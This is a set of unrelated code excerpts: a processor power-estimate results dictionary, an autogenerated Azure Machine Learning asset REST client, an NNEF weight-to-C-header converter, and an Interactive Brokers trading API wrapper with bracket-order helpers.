'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0319681,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0325431,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.131742,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0166212,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.342767,
'Memory Management Unit/Runtime Dynamic': 0.0491642,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.2136,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0640563,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00581928,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0557547,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator 2.3.33.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class AssetOperations(object):
"""AssetOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The version of the Microsoft.MachineLearning resource provider API to use. Constant value: "2018-11-19".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
self.api_version = "2018-11-19"
def create(
self, subscription_id, resource_group_name, workspace, asset, custom_headers=None, raw=False, **operation_config):
"""Create an Asset.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param asset: The payload that is used to register an Asset.
:type asset: ~_restclient.models.Asset
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Asset or ClientRawResponse if raw=true
:rtype: ~_restclient.models.Asset or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(asset, 'Asset')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Asset', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets'}
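# Usage sketch (editor's note; the variable names are illustrative and the
# Asset constructor arguments are an assumption, not taken from this file):
#   ops = AssetOperations(service_client, config, serializer, deserializer)
#   created = ops.create(subscription_id, resource_group, workspace_name,
#                        models.Asset(name='my-asset'))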
def list_query(
self, subscription_id, resource_group_name, workspace, runid=None, project_id=None, name=None, tag=None, properties=None, count=None, skip_token=None, order_by=None, custom_headers=None, raw=False, **operation_config):
"""Query the list of Assets in a workspace. If no filter is passed, the
query lists all the Assets in the given workspace. The returned list is
paginated and the count of items in each page is an optional parameter.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param runid: The run id.
:type runid: str
:param project_id: The project id.
:type project_id: str
:param name: The object name.
:type name: str
:param tag: The object tag.
:type tag: str
:param properties: The object key-value properties.
:type properties: str
:param count: The number of items to retrieve in a page
:type count: str
:param skip_token: The continuation token to retrieve the next page
:type skip_token: str
:param order_by: The option to order response. Possible values
include: 'CreatedAtDesc', 'CreatedAtAsc', 'UpdatedAtDesc',
'UpdatedAtAsc'
:type order_by: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PaginatedAssetList or ClientRawResponse if raw=true
:rtype: ~_restclient.models.PaginatedAssetList or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.list_query.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if runid is not None:
query_parameters['runid'] = self._serialize.query("runid", runid, 'str')
if project_id is not None:
query_parameters['projectId'] = self._serialize.query("project_id", project_id, 'str')
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
if tag is not None:
query_parameters['tag'] = self._serialize.query("tag", tag, 'str')
if properties is not None:
query_parameters['properties'] = self._serialize.query("properties", properties, 'str')
if count is not None:
query_parameters['count'] = self._serialize.query("count", count, 'str')
if skip_token is not None:
query_parameters['$skipToken'] = self._serialize.query("skip_token", skip_token, 'str')
if order_by is not None:
query_parameters['orderBy'] = self._serialize.query("order_by", order_by, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PaginatedAssetList', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_query.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets'}
def patch(
self, subscription_id, resource_group_name, workspace, id, patch, custom_headers=None, raw=False, **operation_config):
"""Patch a specific asset.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param id: The object id.
:type id: str
:param patch: The payload that is used to patch an Asset.
:type patch: list[~_restclient.models.JsonPatchOperation]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Asset or ClientRawResponse if raw=true
:rtype: ~_restclient.models.Asset or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.patch.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str'),
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(patch, '[JsonPatchOperation]')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Asset', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
patch.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets/{id}'}
def query_by_id(
self, subscription_id, resource_group_name, workspace, id, custom_headers=None, raw=False, **operation_config):
"""Gets Asset by ID.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param id: The object id.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Asset or ClientRawResponse if raw=true
:rtype: ~_restclient.models.Asset or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.query_by_id.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str'),
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Asset', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
query_by_id.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets/{id}'}
def delete(
self, subscription_id, resource_group_name, workspace, id, custom_headers=None, raw=False, **operation_config):
"""Deletes the specific asset.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param id: The object id.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str'),
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
| |
+ ", \\\n")
output.write("}\n")
output.close()
return indices
def decoding_data(self, input, output, name, last, identity, first):
'''
Process a single .dat file stored in NNEF format.
To be specific, an NNEF-formatted neural network consists of a .graph file and several .dat files.
This function handles one .dat file: it first reads the file's specifications, such as
its length and shape, then translates the weights stored in binary into packs or digits.
The actual writing-to-header step is done by the writecn and writefc functions.
:param input: IO object corresponding to the .dat file being read
:param output: IO object corresponding to the header file being written
:param name: name of the header file
:param last: whether the given .dat file corresponds to the last batch norm layer
:param identity: whether the given .dat file contains values for a conv, fc, or batch norm layer
:param first: whether this is the first matrix operation in the graph (needed for permutation handling)
:return: if the input file is an fc or conv layer and it is sparse, the number of non-pruned inputs;
if it is a batch norm layer other than the last one, a list of all its values;
otherwise 0
'''
# Skip NNEF header
input.read(4)
# Length of the data in bytes
length = int.from_bytes(input.read(4), byteorder='little')
# Number of dimensions of the data
rank_n = int.from_bytes(input.read(4), byteorder='little')
rank = [] # n,z,y,x
# Determine layer type
batch = (identity == 0)
fc = (identity == 1)
cn = (identity == 2)
# Get dimension sizes
for i in range(0, rank_n):
rank.append(int.from_bytes(input.read(4), byteorder='little'))
# Skip padding
input.read((8 - rank_n) * 4)
bits_per_item = int.from_bytes(input.read(4), byteorder='little')
input.read(2)
size = int(bits_per_item / 8)
# interpret as float or int
# Variables used for quantization
algo = int.from_bytes(input.read(2), byteorder='big')
signess = int.from_bytes(input.read(4), byteorder='little')
# TODO: more about linear and log quantize later
# reference: https://www.khronos.org/registry/NNEF/specs/1.0/nnef-1.0.2.html#container-structure
input.seek(128, 0)
# start reading data
# Flag for sparse operations
sparse = False
indices = []
result = []
# fc needs to be packed in column-major order
if fc:
# Holds decoded weight values
temp_array = np.zeros((rank[0], rank[1]))
for i in range(rank[0]):
for j in range(rank[1]):
temp = list(input.read(size))
# changing endianess
for b in range(0, int(len(temp) / 2)):
temp1 = temp[b]
temp[b] = temp[len(temp) - b - 1]
temp[len(temp) - b - 1] = temp1
temp = bytes(temp)
# decode as float
# If there is a zero, treat as sparse
if struct.unpack('!f', temp)[0] == 0:
sparse = True
temp_array[i, j] = struct.unpack('!f', temp)[0]
# permutation
os.chdir('..')
os.chdir(self.input_dir)
# True if permutation is required
flag = False
for root, dirs, files in os.walk("."):
for name1 in files:
if fnmatch.fnmatch(name1.replace('_', ''), name.replace('weight', 'list.npy').replace('_', '')):
print("Permuting...")
flag = True
temp_weight = np.zeros((rank[0], rank[1]))
permute_list = np.load(name1)
if first:
self.list = permute_list
# permute input channel for current layer so that we can pack weights
for i in range(rank[0]):
temp_weight[i, 0:] = np.copy(temp_array[permute_list[0, i], 0:])
# permute output channel for last layer so that channels match
if len(self.tempweight) != 0:
tt = np.copy(self.tempweight)
if len(tt.shape) == 4:
for j in range(tt.shape[3]):
self.tempweight[0:, 0:, 0:, j] = np.copy(tt[0:, 0:, 0:, permute_list[0, j]])
self.writecn(True, [tt.shape[3], tt.shape[2], tt.shape[1], tt.shape[0]], self.tempweight,
self.tempsparse, self.tempoutput, self.name)
else:
for i in range(rank[0]):
self.tempweight[0:, i] = np.copy(tt[0:, permute_list[0, i]])
self.writefc(True, tt.shape, self.tempweight, self.tempsparse, self.tempoutput, self.name)
# permute the last batch layer as well
tt = np.copy(self.var[self.tempvar])
for i in range(rank[0]):
self.var[self.tempvar][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.mean[self.tempmean])
for i in range(rank[0]):
self.mean[self.tempmean][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.gamma[self.tempgamma])
for i in range(rank[0]):
self.gamma[self.tempgamma][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.beta[self.tempbeta])
for i in range(rank[0]):
self.beta[self.tempbeta][i] = np.copy(tt[permute_list[0, i]])
temp_array = temp_weight
# save this layer's state so that later we can permute its output channel
self.tempweight = temp_array
self.tempoutput = output
self.tempsparse = sparse
self.name = name
self.lastlist = permute_list
break
# If nothing needs to be permuted, this layer is not held in the temporary state of this class,
# so we write it directly into the header file.
# Otherwise, keep it pending so the next layer can permute its output channels first.
if flag:
indices = self.writefc(False, rank, temp_array, sparse, output, name)
else:
indices = self.writefc(True, rank, temp_array, sparse, output, name)
os.chdir("../3pxnet-compiler/autogen")
elif cn:
# First layer in a CNN: it uses a binarized dense layer, so we don't pack it
if rank[1] % 32 != 0:
output.write("#define _" + name + " {\\\n")
temp_array = np.zeros((rank[0], rank[1], rank[2], rank[3]))
for n in range(rank[0]):
for z in range(rank[1]):
for y in range(rank[2]):
for x in range(rank[3]):
temp = list(input.read(size))
# reverse byte order (file data is little-endian; struct.unpack('!f') expects big-endian)
for b in range(0, int(len(temp) / 2)):
temp1 = temp[b]
temp[b] = temp[len(temp) - b - 1]
temp[len(temp) - b - 1] = temp1
temp = bytes(temp)
if struct.unpack('!f', temp)[0] == 0:
sparse = True
temp_array[n, z, y, x] = struct.unpack('!f', temp)[0]
print("Sparse?: " + str(sparse))
for n in range(rank[0]):
for y in range(rank[2]):
for x in range(rank[3]):
for z in range(rank[1]):
temp = temp_array[n, z, y, x]
output.write(str(int(temp)) + ", ")
output.write('\\\n')
output.write("}\n")
output.close()
# other conv layers in a cnn
else:
temp_array = np.zeros((rank[3], rank[2], rank[1], rank[0]))
for n in range(rank[0]):
for z in range(rank[1]):
for y in range(rank[2]):
for x in range(rank[3]):
temp = list(input.read(size))
# reverse byte order (file data is little-endian; struct.unpack('!f') expects big-endian)
for b in range(0, int(len(temp) / 2)):
temp1 = temp[b]
temp[b] = temp[len(temp) - b - 1]
temp[len(temp) - b - 1] = temp1
temp = bytes(temp)
if struct.unpack('!f', temp)[0] == 0:
sparse = True
temp_array[x, y, z, n] = struct.unpack('!f', temp)[0]
print("Sparse?: " + str(sparse))
# permutation
os.chdir('..')
os.chdir(self.input_dir)
flag = False
for root, dirs, files in os.walk("."):
for name1 in files:
if fnmatch.fnmatch(name1.replace('_', ''), name.replace('weight', 'list.npy').replace('_', '')):
print("Permuting...")
flag = True
temp_weight = np.zeros((rank[3], rank[2], rank[1], rank[0]))
permute_list = np.load(name1)
if first:
self.list = permute_list
# permute input channel of current layer
for j in range(rank[0]):
for i in range(rank[1]):
temp_weight[0:, 0:, i, j] = np.copy(temp_array[0:, 0:, permute_list[0, i], j])
# permute output channel of last layer
# since it's not possible to have a fc layer before a conv layer,
# we don't consider that case here.
if len(self.tempweight) != 0:
tt = np.copy(self.tempweight)
for j in range(tt.shape[3]):
self.tempweight[0:, 0:, 0:, j] = np.copy(tt[0:, 0:, 0:, permute_list[0, j]])
self.writecn(True, [tt.shape[3], tt.shape[2], tt.shape[1], tt.shape[0]],
self.tempweight, self.tempsparse, self.tempoutput, self.name)
# permute the last batch layer as well
tt = np.copy(self.var[self.tempvar])
for i in range(rank[0]):
self.var[self.tempvar][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.mean[self.tempmean])
for i in range(rank[0]):
self.mean[self.tempmean][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.gamma[self.tempgamma])
for i in range(rank[0]):
self.gamma[self.tempgamma][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.beta[self.tempbeta])
for i in range(rank[0]):
self.beta[self.tempbeta][i] = np.copy(tt[permute_list[0, i]])
temp_array = temp_weight
# save this layer's state so that later we can permute its output channel
self.tempweight = temp_array
self.tempoutput = output
self.tempsparse = sparse
self.name = name
self.lastlist = permute_list
break
if flag:
indices = self.writecn(False, rank, temp_array, sparse, output, name)
else:
indices = self.writecn(True, rank, temp_array, sparse, output, name)
os.chdir("../3pxnet-compiler/autogen")
# batchnorm
else:
if last:
print("Writing to header " + name + ".h ...")
for i in range(int(length / size)):
# One nice feature of NNEF is that it does not commit to many concrete data types; instead, several
# encoding algorithms are provided. Since the current training engine only trains float weights,
# this converter does not support any other encoding algorithm.
# TODO: depending on encoding algorithm, theoretically we should decode numbers in different ways
# TODO: more support for this later
# reference: https://www.khronos.org/registry/NNEF/specs/1.0/nnef-1.0.2.html#container-structure
if algo == 0:
temp = list(input.read(size))
# reverse byte order (file data is little-endian; struct.unpack('!f') expects big-endian)
for j in range(0, int(len(temp) / 2)):
temp1 = temp[j]
temp[j] = temp[len(temp) - j - 1]
temp[len(temp) - j - 1] = temp1
temp = bytes(temp)
if last and
| |
"""
Created on Fri Jun 25 08:59:35 2021
@author: loann
"""
from threading import Thread
import datetime as dt
import pandas as pd
import queue
import time
import sys, os
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract
from ibapi.order import Order
from ibapi.ticktype import TickTypeEnum
# from enum_IBKR import EnumContract, EnumOrder
class ERROR :
"""! \private
Error management sub-class
"""
def error(self, id, errorCode, errorString):
"""
This function prints errors when they occur
"""
error_message = (
"IB Error ID (%d), Error Code (%d) with "
"response '%s'" % (id, errorCode, errorString)
)
print ("IB Error ID (%d), Error Code (%d) with response '%s'" % (id, errorCode, errorString))
self.error.put(error_message)
class QUEUE :
"""! \private
Queue management sub-class
"""
def init(self) :
file_ = queue.Queue()
self.file = file_
return file_
def get(self, file, timeout = 5) :
return file.get(timeout = timeout)
def getList(self, file, timeout = 5) :
lst = list()
while(file.qsize() > 0) :
lst.append(file.get(timeout = timeout))
file.queue.clear()
return lst
class WRAPPER(EWrapper, QUEUE, ERROR) :
"""! \private
IBKR Wrapper class.
"""
def nextValidId(self,
orderId) :
self.nextValidOrderId = orderId
print ("Next valid ID : ",self.nextValidOrderId)
def currentTime(self, time) :
if self.showLog : print ("Server time : ",time)
self.file.put(time)
def historicalData(self, reqId, bar) :
"""
See : http://interactivebrokers.github.io/tws-api/classIBApi_1_1Bar.html
and : http://interactivebrokers.github.io/tws-api/interfaceIBApi_1_1EWrapper.html#ac943e5b81f6de111ddf71a1f05ab6282
"""
dataLine = {"reqId" : reqId,
"Time" : bar.date,
"Open" : bar.open,
"High" : bar.high,
"Low" : bar.low,
"Close" : bar.close,
"Volume": bar.volume,
"Count" : bar.barCount} # The number of trades during the bar's timespan
if self.showLog : print ("Data line : ",dataLine)
self.file.put(dataLine)
def tickPrice(self,
reqId,
tickType,
price,
attrib) :
if self.showLog : print (TickTypeEnum.to_str(tickType), price, attrib.preOpen)
dataLine = {"tickType" : TickTypeEnum.to_str(tickType),
"price" : price,
"isPreOpen": attrib.preOpen}
self.file.put(dataLine)
def openOrder(self,
orderId,
contract,
order,
orderState) :
loc_order = {
"PermId" : order.permId,
"ClientId" : order.clientId,
"OrderId" : orderId,
"Account" : order.account,
"Symbol" : contract.symbol,
"SecType" : contract.secType,
"Exchange" : contract.exchange,
"Action" : order.action,
"OrderType": order.orderType,
"TotalQty" : order.totalQuantity,
"CashQty" : order.cashQty,
"LmtPrice" : order.lmtPrice,
"AuxPrice" : order.auxPrice,
"Status" : orderState.status
}
if self.showLog : print ("Placed order")
try :
self.file.put(loc_order)
except :
pass
class CLIENT(EClient) :
"""! \private
IBKR Client class
"""
def __init__(self, wrapper) :
EClient.__init__(self, wrapper)
self.showLog = False
self.reqId = 0
def start(self) :
self.thread = Thread(target = self.run)
self.thread.start()
def serverTime(self) :
file = self.wrapper.init()
self.reqCurrentTime()
time = self.wrapper.get(file, timeout = 1)
return time
def hstData(self,
contract,
endDateTime,
durationStr,
barSizeSetting,
whatToShow,
useRTH,
formatDate,
keepUpToDate,
chartOptions,
timeQueue = 1) :
self.reqId += 1
file = self.wrapper.init()
self.reqHistoricalData(self.reqId,
contract,
endDateTime,
durationStr,
barSizeSetting,
whatToShow,
useRTH,
formatDate,
keepUpToDate,
chartOptions)
time.sleep(timeQueue)
hstData_ = self.wrapper.getList(file, timeout = 3)
if len(hstData_) > 0 :
return hstData_
else :
return False
def lastPrice(self,
contract,
marketDataType,
genericTickList,
snapshot,
regulatorySnapshot,
mktDataOptions,
timeQueue = 1) :
self.reqId += 1
file = self.wrapper.init()
self.reqMarketDataType(marketDataType)
self.reqMktData(self.reqId,
contract,
genericTickList,
snapshot,
regulatorySnapshot,
mktDataOptions)
time.sleep(timeQueue)
lastPrice_ = self.wrapper.getList(file, timeout = 3)
if len(lastPrice_) > 0 :
return lastPrice_
else :
return False
def placeOrder__(self,
orderId,
contract,
order) :
file = self.wrapper.init()
self.placeOrder(orderId, contract, order)
time.sleep(1)
try :
placedOrder_ = self.wrapper.get(file, timeout = 3)
except :
placedOrder_ = None
if placedOrder_ is not None :
return placedOrder_
else :
return False
def cancelOrder_(self,
orderId) :
self.cancelOrder(orderId)
class CLIENT_IBKR(WRAPPER, CLIENT) :
"""! \private
IBKR Main client class
"""
def __init__(self) :
WRAPPER.__init__(self)
CLIENT.__init__(self, wrapper=self)
self.host = None
self.portid = None
self.client_id = None
self.nextValidOrderId = None
#==================================
# Low level functions
#==================================
def getNextValidOrderId(self) :
self.nextValidOrderId = self.wrapper.nextValidOrderId
self.wrapper.nextValidOrderId += 1
return self.nextValidOrderId
def connection(self,
host = "127.0.0.1",
portid = 7497,
client_id = 0) :
# Connection to the local server
self.host = host
self.portid = portid
self.client_id = client_id
try :
self.connect(self.host, self.portid, self.client_id)
self.start()
time.sleep(0.1)
self.getNextValidOrderId()
return True
except :
return False
def closePosition(self,
contract,
openOrder) :
openOrder.action = "SELL" if openOrder.action == "BUY" else "BUY"
openOrder.transmit = True
closedOrder = self.placeOrder_(contract, openOrder)
return closedOrder
def placeOrder_(self,
contract,
order) :
orderId = self.getNextValidOrderId()
return self.placeOrder__(orderId,
contract,
order)
#==================================
# High level functions
#==================================
def connection_(self, configFile) :
# Config File extraction
ipaddress = configFile.get("ip")
portid = configFile.get("port")
clientid = configFile.get("client")
connect = self.connection(host = ipaddress,
portid = portid,
client_id = clientid)
self.start()
time.sleep(1)
return connect
def createContract(self, configFile) :
"""
Function that translates a dictionary-formatted contract into a
Contract object as required by the API.
"""
contract = Contract()
for key in list(configFile.keys()) :
setattr(contract, key, configFile.get(key))
return contract
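# A usage sketch (hypothetical field values; any attribute accepted by ibapi's Contract works,
# since the keys are applied verbatim with setattr):
#   contract = client.createContract({"symbol": "AAPL", "secType": "STK",
#                                     "exchange": "SMART", "currency": "USD"})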
def createOrder(self, configFile) :
orderParent = Order()
orderParent.orderId = self.getNextValidOrderId()
# Order direction
if configFile.get("action") == "long" :
orderParent.action = "BUY"
if configFile.get("action") == "short" :
orderParent.action = "SELL"
# Order volume
orderParent.totalQuantity = configFile.get("volume")
# Order type
if configFile.get("orderType") == "MKT" :
orderParent.orderType = "MKT"
orderParent.transmit = False
takeProfitOrder = Order()
takeProfitOrder.orderId = self.getNextValidOrderId()#orderParent.orderId + 1
takeProfitOrder.action = "SELL" if orderParent.action == "BUY" else "BUY"
takeProfitOrder.orderType = "LMT"
takeProfitOrder.totalQuantity = configFile.get("volume")
takeProfitOrder.lmtPrice = configFile.get("takeprofit")
takeProfitOrder.parentId = orderParent.orderId
takeProfitOrder.transmit = False
stoplossOrder = Order()
stoplossOrder.orderId = self.getNextValidOrderId()#orderParent.orderId + 2
stoplossOrder.action = "SELL" if orderParent.action == "BUY" else "BUY"
stoplossOrder.orderType = "STP"
stoplossOrder.totalQuantity = configFile.get("volume")
stoplossOrder.auxPrice = configFile.get("stoploss")
stoplossOrder.parentId = orderParent.orderId
stoplossOrder.transmit = True
bracketOrder = [orderParent, takeProfitOrder, stoplossOrder]
return bracketOrder
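# A usage sketch (hypothetical config values): a long market bracket order of 10 units with a
# take-profit at 105 and a stop-loss at 95 could be built with
#   bracket = client.createOrder({"action": "long", "volume": 10, "orderType": "MKT",
#                                 "takeprofit": 105, "stoploss": 95})
# Only the final stop-loss child has transmit=True, so IB transmits the whole bracket at once.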
def placeOrderList(self, contractFile, orderList) :
# We generate the good contract
contract = self.createContract(contractFile)
for order in orderList :
self.placeOrder__(order.orderId, contract, order)
def editLimitOrder(self, contractFile, order, newLimit) :
contract = self.createContract(contractFile)
if order.orderType == "LMT" :
order.lmtPrice = newLimit
if order.orderType == "STP" :
order.auxPrice = newLimit
self.placeOrder__(order.orderId, contract, order)
def cancelOrder__(self, order = None) :
"""
This function works but needs to be adapted to bracket orders
"""
if order is not None:
self.cancelOrder(order.orderId)
def closePosition_(self,
contractFile,
order = None) :
contract = self.createContract(contractFile)
# print ("Order ID : ",self.getNextValidOrderId())
order.orderId = self.getNextValidOrderId()
return self.closePosition(contract, order)
